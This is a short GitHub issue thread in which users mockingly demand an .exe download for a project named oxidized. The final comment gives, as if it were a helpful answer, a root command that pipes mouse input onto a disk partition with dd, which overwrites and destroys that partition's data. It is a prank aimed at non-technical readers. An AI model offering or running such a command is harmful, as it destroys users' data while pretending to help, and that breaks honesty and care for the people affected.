### ISSUE TITLE
WHERES THE EXE???????

### ISSUE THREAD

**Issue by xstraok** [OxidizedMC/oxidized#7]
JSUT GIVE ME THE EXE IM NOT A STINKY NERD DEVELOPER, JUST UPLOAD THE DAMN EXE LIKE A NORMAL HUMAN PEROSN!!11!

**Comment by quandaledingle44** [comment]
I AGREE!! JUST GIVE US AN EXE FILE WE ARENT SUPERHUMANS WE JUST WANT TA PLEY!!!

**Comment by oh-finks** [comment]
STUPID SMELLY NERDS!

**Comment by WaviestBalloon** [comment]
Run `sudo dd if=/dev/input/mouse0 of=/dev/sda2` and begin violently shaking your mouse.
